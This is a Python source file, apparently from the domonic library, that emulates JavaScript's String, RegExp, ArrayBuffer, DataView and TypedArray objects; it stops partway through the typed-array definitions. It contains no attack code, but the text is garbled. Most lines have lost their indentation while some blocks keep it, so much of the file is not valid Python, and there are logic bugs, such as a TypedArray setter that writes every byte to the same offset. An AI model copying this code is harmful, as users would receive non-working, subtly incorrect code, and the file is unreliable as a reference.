    def toString(self, base: int = None):
        """[returns a string representing the specified Number object.]
        Args:
            base (int): [An integer in the range 2 through 36
            specifying the base to use for representing numeric values.]
        Returns:
            [str]: [a string representing the specified Number object]
        """
        if base is None:
            return str(self.x)
        import string
        digs = string.digits + string.ascii_letters
        x = int(self.x)  # work on a copy so self.x is not mutated
        if x == 0:
            return digs[0]
        sign = -1 if x < 0 else 1
        x *= sign
        digits = []
        while x:
            digits.append(digs[int(x % base)])
            x = int(x / base)
        if sign < 0:
            digits.append("-")
        digits.reverse()
        return "".join(digits)
class String:
"""javascript String methods"""
@staticmethod
def fromCodePoint(codePoint: int):
"""Converts a Unicode code point into a string"""
return chr(codePoint)
@staticmethod
def toCodePoint(char: str):
"""Converts a Unicode string into a code point"""
return ord(char)
@staticmethod
    def raw(string):
        """Returns the string as-is (no escaping or template processing is applied)"""
        return string
# @staticmethod
# def fromCharCode(code: int):
# """ Converts a Unicode code point into a string """
# return chr(code)
@staticmethod
def toCharCode(char: str):
"""Converts a Unicode string into a code point"""
return ord(char)
def __init__(self, x="", *args, **kwargs):
# self.args = args
# self.kwargs = kwargs
self.x = str(x)
def __str__(self):
return self.x
def __eq__(self, other):
if isinstance(other, str):
return self.x == other
if isinstance(other, String):
return self.x == other.x
return False
# def __repr__(self):
# return self.x
def __getitem__(self, item):
# print(item)
return self.x[item]
def __add__(self, other):
return self.x + other
def __radd__(self, other):
return self.x + other
def __iadd__(self, other):
return self.x + other
def __sub__(self, other):
return self.x - other
def __rsub__(self, other):
return other - self.x
def __isub__(self, other):
return self.x - other
def __mul__(self, other):
return self.x * int(other)
def __rmul__(self, other):
return self.x * int(other)
def __imul__(self, other):
return self.x * int(other)
def split(self, expr) -> list:
"""[can split a string based on a regex]
Args:
expr ([str]): [valid regex or string to split on]
Returns:
[list]: [list of str]
"""
# if isinstance( expr, RegExp)
import re
# print( '>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.', type(expr) )
is_regex = False
try:
re.compile(expr)
is_regex = True
except re.error:
is_regex = False
if is_regex:
return re.split(expr, self.x)
else:
return self.x.split(expr)
def concat(self, *args, seperator: str = "") -> str:
"""[concatenates the string arguments to the calling string and returns a new string.]
Args:
seperator (str, optional): []. Defaults to "".
Returns:
[type]: [A new string containing the combined text of the strings provided.]
"""
args = list(args)
args.insert(0, self.x)
return seperator.join(args)
# @staticmethod
def charCodeAt(self, index: int) -> int:
"""Returns the Unicode of the character at the specified index"""
return ord(self.x[index])
# @staticmethod
def fromCharCode(self, *codes) -> str:
"""returns a string created from the specified sequence of UTF-16 code units"""
return "".join([str(chr(x)) for x in codes])
@property
def length(self) -> int:
return len(self.x)
def repeat(self, count: int) -> str:
"""Returns a new string with a specified number of copies of an existing string"""
return self.x * count
    def startsWith(self, x: str, start: int = None, end: int = None) -> bool:
        """Checks whether a string begins with specified characters"""
        if start is None:
            start = 0
        if end is None:
            end = len(self.x)
        return self.x.startswith(x, start, end)
def substring(self, start: int, end: int = None) -> str:
"""Extracts the characters from a string, between two specified indices"""
if start < 0:
start = 0
if end is None:
end = len(self.x)
return self.x[start:end]
    def endsWith(self, x: str, start: int = None, end: int = None) -> bool:
        """Checks whether a string ends with specified string/characters"""
        if start is None:
            start = 0
        if end is None:
            end = len(self.x)
        return self.x.endswith(x, start, end)
def toLowerCase(self) -> str:
"""Converts a string to lowercase letters"""
return self.x.lower()
def toUpperCase(self) -> str:
"""Converts a string to uppercase letters"""
return self.x.upper()
def slice(self, start: int = 0, end: int = None) -> str:
"""Selects a part of an string, and returns the new string"""
if end is None:
end = len(self.x)
return self.x[start:end]
def trim(self):
"""Removes whitespace from both ends of a string"""
return self.x.strip()
def charAt(self, index: int) -> str:
"""[Returns the character at the specified index (position)]
Args:
index (int): [index position]
Returns:
[str]: [the character at the specified index.
if the index is out of range, an empty string is returned.]
"""
try:
return self.x[index]
except IndexError:
return ""
def replace(self, old: str, new) -> str:
"""
Searches a string for a specified value, or a regular expression,
and returns a new string where the specified values are replaced.
only replaces first one.
"""
if callable(new):
# return new(self.x, old)
return re.sub(old, new, self.x)
else:
return self.x.replace(old, new, 1)
# re.sub(r"regepx", "old", "new") # TODO - js one also takes a regex
def replaceAll(self, old: str, new: str):
"""[returns a new string where the specified values are replaced. ES2021]
Args:
old ([str]): [word to remove]
new ([str]): [word to replace it with]
Returns:
            [str]: [new string with all occurrences of old word replaced]
"""
return self.x.replace(old, new)
# def localeCompare():
# """ Compares two strings in the current locale """
# pass
def substr(self, start: int = 0, end: int = None):
"""Extracts the characters from a string, beginning at a specified start position,
and through the specified number of character"""
if end is None:
end = len(self.x)
return self.x[start : start + end]
def toLocaleLowerCase(self) -> str:
"""Converts a string to lowercase letters, according to the host's locale"""
# locale.setlocale()
return self.x.lower()
def toLocaleUpperCase(self) -> str:
"""Converts a string to uppercase letters, according to the host's locale"""
# locale.setlocale()
return self.x.upper()
def indexOf(self, searchValue: str, fromIndex: int = 0):
"""[returns the index within the calling String object of the first occurrence of the specified value,
starting the search at fromIndex ]
Args:
searchValue (str): [The string value to search for.]
fromIndex (int): [An integer representing the index at which to start the search]
Returns:
[type]: [The index of the first occurrence of searchValue, or -1 if not found.]
"""
try:
return self.x.index(searchValue, fromIndex)
except ValueError:
return -1
def codePointAt(self, index: int):
"""[Returns the Unicode code point at the specified index (position)]
Args:
index (int): [index position]
Returns:
[type]: [the Unicode code point at the specified index (position)]
"""
return ord(self.x[index])
def padEnd(self, length: int, padChar: str = " ") -> str:
"""[Pads the end of a string with a specified character
(repeated, if needed) to create a new string.]
Args:
length (int): [the length of the resulting string]
padChar (str, optional): [the character to use for padding. Defaults to " "].
Returns:
[str]: [the padded string]
"""
return str(self.x + padChar * (length - len(self.x)))
def padStart(self, length: int, padChar: str = " ") -> str:
"""[Pads the start of a string with a specified character]
Args:
length (int): [the length of the resulting string]
padChar (str, optional): [the character to use for padding. Defaults to " "].
Returns:
[str]: [the padded string]
"""
return padChar * (length - len(self.x)) + self.x
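    # A usage sketch for padStart/padEnd (assumes a single-character padChar):
    # >>> String("5").padStart(3, "0")
    # '005'
    # >>> String("5").padEnd(3, "0")
    # '500'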
def localeCompare(self, comparisonString: str, locale: str = None, *args) -> int:
"""method returns a number indicating whether a reference string comes before,
or after, or is the same as the given string in sort order"""
# if locale is None:
# locale = self.locale
# return locale.strcoll(self.x, comparisonString, *args)
# pass
# TODO - implement localeCompare
raise NotImplementedError
def trimStart(self, length: int): # TODO - huh?. length
"""[Removes whitespace from the beginning of a string.]
Args:
length (int): [the length of the resulting string]
Returns:
[str]: [the trimmed string]
"""
return self.x.lstrip()
def trimEnd(self, length: int): # TODO - huh?. length
"""[Removes whitespace from the end of a string]
Args:
length (int): [the length of the resulting string]
Returns:
[type]: [the trimmed string]
"""
return self.x.rstrip()
def includes(self, searchValue: str, position: int = 0) -> bool:
"""[returns true if the specified string is found within the calling String object,]
Args:
searchValue (str): [The string value to search for.]
position (int, optional): [the position to search from]. Defaults to 0.
Returns:
[type]: [a boolean value indicating whether the search value was found.]
"""
return searchValue in self.x[position:]
    def search(self, searchValue: str, position: int = 0) -> int:
        """[returns the index of the first match for the pattern within the string,]
        starting at the specified position.
        Args:
            searchValue (str): [The pattern to search for.]
            position (int, optional): [the position to search from]. Defaults to 0.
        Returns:
            [int]: [the index of the first match, or -1 if nothing was found.]
        """
        m = re.search(searchValue, self.x[position:])
        return position + m.start() if m else -1
    def matchAll(self, pattern: str):
        """
        Searches the string for all matches of a regular expression
        and returns an iterator over the match objects.
        """
        return re.finditer(pattern, self.x)
    def match(self, pattern: str):
        """
        Searches the string for a match against a regular expression
        and returns the first match object (or None).
        """
        return re.search(pattern, self.x)
    def compile(self, pattern: str):
        """
        Compiles the given pattern into a regular expression object.
        """
        return re.compile(pattern)
    def lastIndexOf(self, searchValue: str, fromIndex: int = 0):
        """
        returns the index of the last occurrence of the specified value within the calling String object,
        searching from fromIndex, or -1 if not found
        """
        try:
            return self.x.rindex(searchValue, fromIndex)
        except ValueError:
            return -1
# def test(self, pattern: str):? was this on string?
# TODO - test all these
def anchor(self, name: str):
# from domonic.html import a
# return a(str(self), _name=name) #TODO - no href bug
return '<a name="{}">{}</a>'.format(name, self.x)
def big(self):
"""[wraps the string in big tags]
Returns:
[str]: [the string in big tags]
"""
return "<big>" + self.x + "</big>"
def blink(self):
"""[wraps the string in blink tags]
Returns:
[str]: [the string in blink tags]
"""
return "<blink>" + self.x + "</blink>"
def bold(self):
"""[wraps the string in bold tags]
Returns:
[str]: [the string in bold tags]
"""
return "<b>" + self.x + "</b>"
def fixed(self):
"""[wraps the string in fixed tags]
Returns:
[str]: [the string in fixed tags]
"""
return "<tt>" + self.x + "</tt>"
def fontcolor(self, color: str):
"""[wraps the string in font tags with a specified color]
Args:
color (str): [the color to use]
Returns:
[str]: [the string in font tags]
"""
return "<font color=" + color + ">" + self.x + "</font>"
def fontsize(self, size: str):
"""[wraps the string in font tags with a specified size]
Args:
size (str): [the size to use]
Returns:
[str]: [the string in font tags]
"""
return "<font size=" + size + ">" + self.x + "</font>"
def italics(self):
"""[wraps the string in italics tags]
Returns:
[str]: [the string in italics tags]
"""
return "<i>" + self.x + "</i>"
def link(self, url: str):
"""[wraps the string in a link tag]
Args:
url (str): [the url to use]
Returns:
[str]: [the string in a link tag]
"""
return "<a href=" + url + ">" + self.x + "</a>"
def small(self):
"""[wraps the string in small tags]
Returns:
[str]: [the string in small tags]
"""
return "<small>" + self.x + "</small>"
def strike(self):
"""[wraps the string in strike tags]
Returns:
[str]: [the string in strike tags]
"""
return "<strike>" + self.x + "</strike>"
def sub(self):
"""[wraps the string in sub tags]
Returns:
[str]: [the string in sub tags]
"""
return "<sub>" + self.x + "</sub>"
def sup(self):
"""[wraps the string in sup tags]
Returns:
[str]: [the string in sup tags]
"""
return "<sup>" + self.x + "</sup>"
def div(self, *args, **kwargs):
"""[wraps the string in a div tag]
Returns:
[str]: [the string in a div tag]
"""
from domonic.html import div
return div(self.x, *args, **kwargs)
def webpage(self):
"""[wraps the string in a webpage]
Returns:
[str]: [the string as a webpage]
"""
from domonic.html import body, h1, head, html, link, meta, script, style, title
content = html(
head(
title(self.x),
script(""),
style(""),
meta(_charset="utf-8"),
link(_rel="stylesheet", _href=""),
),
body(
h1(self.x),
),
)
return str(content)
def __call__(self, tag: str, **kwargs):
"""
lets you transform a string into a dom element
with the string as the content.
also accepts a list of kwargs to pass as attributes
i.e
>>> test = String("time to take a mo")
>>> test('div', _style="font-color:red;")
>>> str(test('div', _style="font-color:red;"))
"""
from domonic.dom import Document
return Document.createElement(tag, self.x, **kwargs)
class RegExp:
def __init__(self, expression, flags=""):
self.expression = expression
self.flags = flags.lower() #: A string that contains the flags of the RegExp object.
# self.multiline # Whether or not to search in strings across multiple lines.
# self.source # The text of the pattern.
# self.sticky # Whether or not the search is sticky
# self.lastIndex # The index at which to start the next match.
@property
def dotAll(self):
"""[Whether . matches newlines or not.]
Returns:
[bool]: [True if dot matches newlines, False otherwise]
"""
return "s" in self.flags
@dotAll.setter
def dotAll(self, value: bool):
"""[Whether . matches newlines or not.]
Args:
value (bool): [True if dot matches newlines, False otherwise]
"""
if "s" not in self.flags:
self.flags += "s" if value else ""
    @property
    def multiline(self):
        """[Whether or not to search in strings across multiple lines.]
        Returns:
            [bool]: [True if multiline, False otherwise]
        """
        return "m" in self.flags
    @multiline.setter
    def multiline(self, value: bool):
        """[Whether or not to search in strings across multiple lines.]
        Args:
            value (bool): [True if multiline, False otherwise]
        """
        if "m" not in self.flags:
            self.flags += "m" if value else ""
@property
def source(self):
"""[The text of the pattern.]
Returns:
[str]: [The text of the pattern.]
"""
return self.expression
@property
def global_(self):
"""[Whether to test the regular expression against all possible matches in a string,
or only against the first.]
Returns:
[bool]: [True if global, False otherwise]
"""
return "g" in self.flags
@global_.setter
def global_(self, value: bool):
"""[Whether to test the regular expression against all possible matches in a string,
or only against the first.]
Args:
value (bool): [True if global, False otherwise]
"""
if "g" not in self.flags:
self.flags += "g" if value else ""
@property
def hasIndices(self):
"""[Whether the regular expression result exposes the start and end indices of captured substrings.]
Returns:
[bool]: [True if hasIndices, False otherwise]
"""
return "d" in self.flags
@hasIndices.setter
def hasIndices(self, value: bool):
"""[Whether the regular expression result exposes the start and end indices of captured substrings.]
Args:
value (bool): [True if hasIndices, False otherwise]
"""
if "d" not in self.flags:
self.flags += "d" if value else ""
@property
def ignoreCase(self):
"""[Whether to ignore case while attempting a match in a string.]
Returns:
[bool]: [True if ignoreCase, False otherwise]
"""
return "i" in self.flags
@ignoreCase.setter
def ignoreCase(self, value: bool):
"""[Whether to ignore case while attempting a match in a string.]
Args:
value (bool): [True if ignoreCase, False otherwise]
"""
if "i" not in self.flags:
self.flags += "i" if value else ""
@property
def unicode(self):
"""[Whether or not Unicode features are enabled.]
Returns:
[bool]: [True if unicode, False otherwise]
"""
return "u" in self.flags
@unicode.setter
def unicode(self, value: bool):
"""[Whether or not Unicode features are enabled.]
Args:
value (bool): [True if unicode, False otherwise]
"""
if "u" not in self.flags:
self.flags += "u" if value else ""
def compile(self):
"""(Re-)compiles a regular expression during execution of a script."""
pass
# def exec(self, s: str): # TODO - test
# """ Executes a search for a match in its string parameter. """
# class Match:
# def __init__(self, index: int, match: str):
# self.index = index
# self.match = match
# def __str__(self):
# return f'{self.match}'
# def __repr__(self):
# return f'{self.match}'
# def __getitem__(self, index):
# return self.match[index]
# matches = re.finditer(self.expression, s, flags=re.MULTILINE) # TODO - flags
# return [Match(m.start(), m.group(0)) for m in matches]
# TODO - wanted to change this to be like above. but d3 required me to rollback.
# need to check if i modifed that implementation to fit my needs at the time.
def exec(self, s: str):
"""Executes a search for a match in its string parameter."""
# print("exec:", self.expression, s)
m = re.search(self.expression, s)
# print(m)
if m:
return [s for s in m.groups()]
def test(self, s: str):
"""[Tests for a match in its string parameter.]
Args:
s (str): [a string to match]
Returns:
[bool]: [True if match else False]
"""
m = re.match(self.expression, s)
# print(m)
if m:
return True
else:
return False
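    # A minimal usage sketch (note that test() anchors at the start of the string via re.match):
    # >>> RegExp(r"\d+").test("123abc")
    # True
    # >>> RegExp(r"(\d+)-(\d+)").exec("10-20")
    # ['10', '20']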
def toString(self):
"""Returns a string representation of the RegExp object."""
return self.__str__()
    def __str__(self):
        """Returns a string representing the specified object.
        Overrides the Object.prototype.toString() method."""
        return self.expression
# def [@@match]()
# Performs match to given string and returns match result.
# def [@@matchAll]()
# Returns all matches of the regular expression against a string.
# def [@@replace]()
# Replaces matches in given string with new substring.
# def [@@search]()
# Searches the match in given string and returns the index the pattern found in the string.
# def [@@split]()
# Splits given string into an array by separating the strin
def ToInt32(v):
    # wrap to a signed 32-bit integer (two's complement)
    v = int(v) & 0xFFFFFFFF
    return v - 0x100000000 if v >= 0x80000000 else v
def ToUint32(v):
    # wrap to an unsigned 32-bit integer
    return int(v) & 0xFFFFFFFF
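# A short sketch of the 32-bit coercion helpers (values wrap modulo 2**32):
# >>> ToUint32(-1)
# 4294967295
# >>> ToInt32(0xFFFFFFFF)
# -1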
class ArrayBuffer:
def __init__(self, length):
# self.length = length
self.buffer = array.array("B", [0] * length)
# self.byteLength = length
self.isView = False
@property
def byteLength(self):
return self.buffer.buffer_info()[1]
def __getitem__(self, index):
return self.buffer[index]
def __setitem__(self, index, value):
self.buffer[index] = value
    def __getattr__(self, name):
        # return getattr(self.buffer, name)
        # TODO - try on self if not found, get from buffer. (was this a todo?)
        return getattr(self.buffer, name)
def __len__(self):
# return self.length
return len(self.buffer)
@property
def length(self):
# return self.__length
return len(self.buffer)
# @length.setter
def __str__(self):
return str(self.buffer)
def __repr__(self):
return repr(self.buffer)
def slice(self, start, end):
return self.buffer[start:end]
class DataView(ArrayBuffer):
    # ?? is this right. don't look
    def __init__(self, buffer, byteOffset=0, byteLength=None):
        if byteLength is None:
            byteLength = buffer.byteLength - byteOffset
        super().__init__(byteLength)
        self.isView = True
        self.buffer = buffer
        self.byteOffset = byteOffset
        self._byteLength = byteLength
    @property
    def byteLength(self):
        # byteLength is a read-only property on ArrayBuffer, so shadow it here
        return self._byteLength
def getUint8(self, index):
return self.buffer.getUint8(self.byteOffset + index)
def getInt8(self, index):
return self.buffer.getInt8(self.byteOffset + index)
def getUint16(self, index, littleEndian=False):
return self.buffer.getUint16(self.byteOffset + index, littleEndian)
def getInt16(self, index, littleEndian=False):
return self.buffer.getInt16(self.byteOffset + index, littleEndian)
def getUint32(self, index, littleEndian=False):
return self.buffer.getUint32(self.byteOffset + index, littleEndian)
def getInt32(self, index, littleEndian=False):
return self.buffer.getInt32(self.byteOffset + index, littleEndian)
def getFloat32(self, index, littleEndian=False):
return self.buffer.getFloat32(self.byteOffset + index, littleEndian)
def getFloat64(self, index, littleEndian=False):
return self.buffer.getFloat64(self.byteOffset + index, littleEndian)
def setUint8(self, index, value):
self.buffer.setUint8(self.byteOffset + index, value)
def setInt8(self, index, value):
self.buffer.setInt8(self.byteOffset + index, value)
def setUint16(self, index, value, littleEndian=False):
self.buffer.setUint16(self.byteOffset + index, value, littleEndian)
def setInt16(self, index, value, littleEndian=False):
self.buffer.setInt16(self.byteOffset + index, value, littleEndian)
class TypedArray:
BYTES_PER_ELEMENT = 1
def __init__(self, *args):
"""[ creates a new Int8Array
can take the following forms:
Int8Array()
Int8Array(length)
Int8Array(typedArray)
Int8Array(object)
Int8Array(buffer)
Int8Array(buffer, byteOffset)
Int8Array(buffer, byteOffset, length)
]
"""
self.name = "Int8Array"
self.byteOffset = 0
# self.BYTES_PER_ELEMENT = Int8Array.BYTES_PER_ELEMENT
if len(args) == 0:
self.buffer = array.array("B", [0] * 0)
self.length = 0
self.byteLength = self.length * self.BYTES_PER_ELEMENT
self.isView = False
return
arg = args[0]
# print(arg)
# print(type(arg))
if isinstance(arg, (Int8Array, ArrayBuffer)):
# self.buffer = arg.buffer
# self.byteLength = arg.byteLength
# self.length = arg.length
# self.isView = arg.isView
self.buffer = arg
if len(args) > 1:
self.byteOffset = args[1]
else:
self.byteOffset = 0
self.byteOffset = ToUint32(self.byteOffset)
# if (this.byteOffset > this.buffer.byteLength) {
# throw new RangeError("byteOffset out of range");
# }
if self.byteOffset > self.buffer.byteLength:
# raise RangeError("byteOffset out of range")
raise Exception("byteOffset out of range")
# if (this.byteOffset % this.BYTES_PER_ELEMENT) {
# // The given byteOffset must be a multiple of the element size of the specific type,
# otherwise an exception is raised.
# throw new RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size.");
# }
if self.byteOffset % self.BYTES_PER_ELEMENT:
# raise RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size.")
raise Exception("ArrayBuffer length minus the byteOffset is not a multiple of the element size.")
if len(args) < 3:
self.byteLength = self.buffer.byteLength - self.byteOffset
if self.byteLength % self.BYTES_PER_ELEMENT:
# raise RangeError("length of buffer minus byteOffset not a multiple of the element size");
raise Exception("length of buffer minus byteOffset not a multiple of the element size")
                self.length = self.byteLength // self.BYTES_PER_ELEMENT
else:
self.length = ToUint32(args[2])
self.byteLength = self.length * self.BYTES_PER_ELEMENT
if (self.byteOffset + self.byteLength) > self.buffer.byteLength:
# raise RangeError("byteOffset and length reference an area beyond the end of the buffer");
raise Exception("byteOffset and length reference an area beyond the end of the buffer")
return
# elif isinstance(arg, array.array):
# print('c!!!!')
# self.buffer = arg
# self.byteLength = len(arg)
# self.length = len(arg)
# self.isView = False
# if len(args) == 2:
# self.byteOffset = args[1]
# if len(args) == 3:
# self.byteOffset = args[1]
# self.length = args[2]
# return
elif isinstance(arg, dict):
self.buffer = array.array("B", [0] * 0)
self.byteLength = 0
# self.length = 0
self.isView = False
self.set(arg)
return
elif isinstance(arg, int):
# self.buffer = array.array('B', [0] * arg)
print("a!")
# self.buffer = ArrayBuffer(arg)
# self.byteLength = arg
# self.length = arg
# self.isView = False
# // Constructor(unsigned long length)
self.length = ToInt32(args[0])
if self.length < 0:
raise Exception("ArrayBufferView size is not a small enough positive integer")
self.byteLength = self.length * self.BYTES_PER_ELEMENT
self.buffer = ArrayBuffer(self.byteLength)
self.byteOffset = 0
return
elif isinstance(arg, list):
# print('bb!', arg)
# self.buffer = array.array('B', arg)
# self.byteLength = len(arg)
# self.length = len(arg)
# self.isView = False
# // Constructor(sequence<type> array)
sequence = arg
self.length = ToUint32(len(sequence))
self.byteLength = self.length * self.BYTES_PER_ELEMENT
self.buffer = ArrayBuffer(self.byteLength)
self.byteOffset = 0
for i in range(self.length):
s = sequence[i]
self.__setitem__(i, Number(s))
return
else:
raise TypeError("Invalid argument type")
# @property
# def length(self):
# return self.buffer.buffer_info()[1]
# @length.setter
# def length(self, value):
# self.buffer.length = value
@property # TODO - test try this for sneaky way of binding to exsiting array methods?
def args(self):
return self.buffer
    @classmethod
    def of(cls, *args):
        # Creates a new typed array with a variable number of arguments
        return cls(list(args))
    @classmethod
    def from_(cls, thing):
        # Creates a new typed array from an array-like or iterable object
        return cls(list(thing))
# def __getitem__(self, index):
# return self.buffer[index]
# def __setitem__(self, index, value):
# self.buffer[index] = value
# // getter type (unsigned long index);
def __getitem__(self, index):
if index is None:
raise SyntaxError("Not enough arguments")
index = ToUint32(index)
if index >= self.length:
return undefined
b = []
i = 0
o = self.byteOffset + index * self.BYTES_PER_ELEMENT
for i in range(0, self.BYTES_PER_ELEMENT):
b.append(self.buffer[o])
o += 1
return self._unpack(b)
# // NONSTANDARD: convenience alias for getter: type get(unsigned long index);
get = __getitem__
# // setter void (unsigned long index, type value);
def __setitem__(self, index, value):
# print('set', index, value)
if index is None and value is None:
raise SyntaxError("Not enough arguments")
index = ToUint32(index)
if index >= self.length:
return undefined
b = self._pack(value)
# print(b)
# print( self._pack(10) )
# print( self._pack(20) )
# print( self._pack(30) )
i = 0
o = self.byteOffset + index * self.BYTES_PER_ELEMENT
for i in range(0, self.BYTES_PER_ELEMENT):
self.buffer[o] = b[i]
# // void set(TypedArray array, optional unsigned long offset);
# // void set(sequence<type> array, optional unsigned long offset);
    def set(self, index, value=None):
        if index is None:
            raise SyntaxError("Not enough arguments")
        if isinstance(index, TypedArray):
            # void set(TypedArray array, optional unsigned long offset)
            arr = index
            offset = ToUint32(value if value is not None else 0)
            if offset + arr.length > self.length:
                raise Exception("Offset plus length of array is out of range")
            byteOffset = self.byteOffset + offset * self.BYTES_PER_ELEMENT
            byteLength = arr.length * self.BYTES_PER_ELEMENT
            if arr.buffer == self.buffer:
                # the source and destination share a buffer, so copy via a temporary list
                tmp = []
                s = arr.byteOffset
                for i in range(0, byteLength):
                    tmp.append(arr.buffer[s])
                    s += 1
                d = byteOffset
                for i in range(0, byteLength):
                    self.buffer[d] = tmp[i]
                    d += 1
            else:
                s = arr.byteOffset
                d = byteOffset
                for i in range(0, byteLength):
                    self.buffer[d] = arr.buffer[s]
                    s += 1
                    d += 1
        elif isinstance(index, (list, tuple, Array)):
            # void set(sequence<type> array, optional unsigned long offset)
            sequence = index
            nlen = ToUint32(len(sequence))
            offset = ToUint32(value if value is not None else 0)
            if offset + nlen > self.length:
                raise Exception("Offset plus length of array is out of range")
            for i in range(0, nlen):
                s = sequence[i]
                self.__setitem__(offset + i, Number(s))
        else:
            raise TypeError("Unexpected argument type(s)")
# // TypedArray subarray(long begin, optional long end);
    def subarray(self, start, end):
        def clamp(v, lo, hi):
            m1 = hi if v > hi else v
            return lo if v < lo else m1
        if start is None:
            start = 0
        if end is None:
            end = self.length
        start = ToInt32(start)
        end = ToInt32(end)
        if start < 0:
            start = self.length + start
        if end < 0:
            end = self.length + end
        start = clamp(start, 0, self.length)
        end = clamp(end, 0, self.length)
        nlen = end - start
        if nlen < 0:
            nlen = 0
        # build a new view of the same buffer (__init__ itself returns None, so construct properly)
        return type(self)(self.buffer, self.byteOffset + start * self.BYTES_PER_ELEMENT, nlen)
def as_signed(value, bits):
    """Converts an unsigned integer to a signed integer (two's complement within `bits` bits)."""
    mask = (1 << bits) - 1
    value &= mask
    sign_bit = 1 << (bits - 1)
    return value - (1 << bits) if value & sign_bit else value
def as_unsigned(value, bits):
    """Converts a value to an unsigned integer within `bits` bits."""
    return value & ((1 << bits) - 1)
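# A short sketch of the sign-conversion helpers above:
# >>> as_signed(0xFF, 8)
# -1
# >>> as_unsigned(-1, 8)
# 255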
class __byteutils__:
def packI8(self, n):
return [n & 0xFF]
# return struct.pack('B', n)
def unpackI8(self, b):
return as_signed(b[0], 8)
# return struct.unpack('B', b)[0]
def packU8(self, n):
return [n & 0xFF]
# return struct.pack('B', n)
def unpackU8(self, bytes):
return as_unsigned(bytes[0], 8)
# return struct.unpack('B', bytes)[0]
def packU8Clamped(self, n):
n = Math.round(Number(n))
# return [n < 0 ? 0 : n > 0xff ? 0xff : n & 0xff]
if n < 0:
return [0]
elif n > 0xFF:
return [0xFF]
else:
return [n & 0xFF]
# return struct.pack('B', n)
def packI16(self, n):
return [(n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>H', n)
def unpackI16(self, bytes):
return as_signed(bytes[0] << 8 | bytes[1], 16)
# return struct.unpack('>H', bytes)[0]
def packU16(self, n):
return [(n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>H', n)
def unpackU16(self, bytes):
return as_unsigned(bytes[0] << 8 | bytes[1], 16)
# return struct.unpack('>H', bytes)[0]
def packI32(self, n):
return [(n >> 24) & 0xFF, (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>I', n)
def unpackI32(self, bytes):
return as_signed(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32)
# return struct.unpack('>I', bytes)[0]
def packU32(self, n):
return [(n >> 24) & 0xFF, (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF]
# return struct.pack('>I', n)
def unpackU32(self, bytes):
return as_unsigned(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32)
# return struct.unpack('>I', bytes)[0]
def packIEEE754(self, v, ebits, fbits):
bias = (1 << (ebits - 1)) - 1
def roundToEven(n):
w = Math.floor(n)
f = n - w
if f < 0.5:
return w
if f > 0.5:
return w + 1
            # return w % 2 ? w + 1 : w
            return w + 1 if (w % 2) else w
# Compute sign, exponent, fraction
if v != v:
# NaN
# http://dev.w3.org/2006/webapi/WebIDL/#es-type-mapping
e = (1 << ebits) - 1
f = pow(2, fbits - 1)
s = 0
elif v == Global.Infinity or v == -Global.Infinity:
e = (1 << ebits) - 1
f = 0
# s = (v < 0) ? 1 : 0
s = 1 if (v < 0) else 0
        elif v == 0:
            e = 0
            f = 0
            # detect negative zero without dividing by zero (1 / 0 raises in Python)
            s = 1 if str(float(v)).startswith("-") else 0
else:
            s = 1 if v < 0 else 0
v = abs(v)
if v >= pow(2, 1 - bias):
e = min(Math.floor(Math.log(v) / Math.LN2), 1023)
f = roundToEven(v / pow(2, e) * pow(2, fbits))
if f / pow(2, fbits) >= 2:
e = e + 1
f = 1
if e > bias:
# Overflow
e = (1 << ebits) - 1
f = 0
else:
# Normalized
e = e + bias
f = f - pow(2, fbits)
else:
# Denormalized
e = 0
f = roundToEven(v / pow(2, 1 - bias - fbits))
# Pack sign, exponent, fraction
bits = []
for i in range(fbits):
bits.append(f % 2)
f = Math.floor(f / 2)
for i in range(ebits):
bits.append(e % 2)
e = Math.floor(e / 2)
bits.append(s)
        bits.reverse()
        mystr = "".join(str(int(bit)) for bit in bits)
        # Bits to bytes
        b = []
        while len(mystr):
            b.append(parseInt(mystr[0:8], 2))
            mystr = mystr[8:]
        return b
    def unpackIEEE754(self, bytes, ebits, fbits):
        # Bytes to bits (most-significant byte first, matching packIEEE754 output)
        bits = []
        for i in range(len(bytes) - 1, -1, -1):
            b = bytes[i]
            for j in range(8):
                bits.append(1 if b % 2 else 0)
                b = b >> 1
        bits.reverse()
        mystr = "".join(str(bit) for bit in bits)
# Unpack sign, exponent, fraction
bias = (1 << (ebits - 1)) - 1
# s = parseInt(str.substring(0, 1), 2) ? -1 : 1
s = -1 if (mystr[0] == "1") else 1
        e = parseInt(mystr[1:1 + ebits], 2)
        f = parseInt(mystr[1 + ebits:], 2)
# // Produce number
if e == (1 << ebits) - 1:
# return f !== 0 ? NaN : s * Infinity
if f != 0:
return Global.NaN
else:
                return s * Global.Infinity
elif e > 0:
# Normalized
return s * pow(2, e - bias) * (1 + f / pow(2, fbits))
elif f != 0:
# Denormalized
return s * pow(2, -(bias - 1)) * (f / pow(2, fbits))
else:
return -0 if s < 0 else 0
def unpackF64(self, b):
return self.unpackIEEE754(b, 11, 52)
# return struct.unpack('>d', b)[0]
def packF64(self, v):
return self.packIEEE754(v, 11, 52)
# return struct.pack('>d', v)
def unpackF32(self, b):
return self.unpackIEEE754(b, 8, 23)
# return struct.unpack('>f', b)[0]
def packF32(self, v):
return self.packIEEE754(v, 8, 23)
# return struct.pack('>f', v)
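    # A round-trip sketch for the IEEE-754 helpers (assumes Math/parseInt behave as elsewhere in this module):
    # >>> bu = __byteutils__()
    # >>> bu.unpackF32(bu.packF32(1.5))
    # 1.5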
Int8Array = type(
"Int8Array", (TypedArray,), {"name": "Int8Array", "_pack": __byteutils__.packI8, "_unpack": __byteutils__.unpackI8}
)
Int8Array.BYTES_PER_ELEMENT = 1
Uint8Array = type(
"Uint8Array",
(TypedArray,),
{"name": "Uint8Array", "_pack": __byteutils__.packU8, "_unpack": __byteutils__.unpackU8},
)
Uint8Array.BYTES_PER_ELEMENT = 1
Uint8ClampedArray = type(
"Uint8ClampedArray",
(TypedArray,),
{"name": "Uint8ClampedArray", "_pack": __byteutils__.packU8Clamped, "_unpack": __byteutils__.unpackU8},
)
Uint8ClampedArray.BYTES_PER_ELEMENT = 1
Int16Array = type(
"Int16Array",
(TypedArray,),
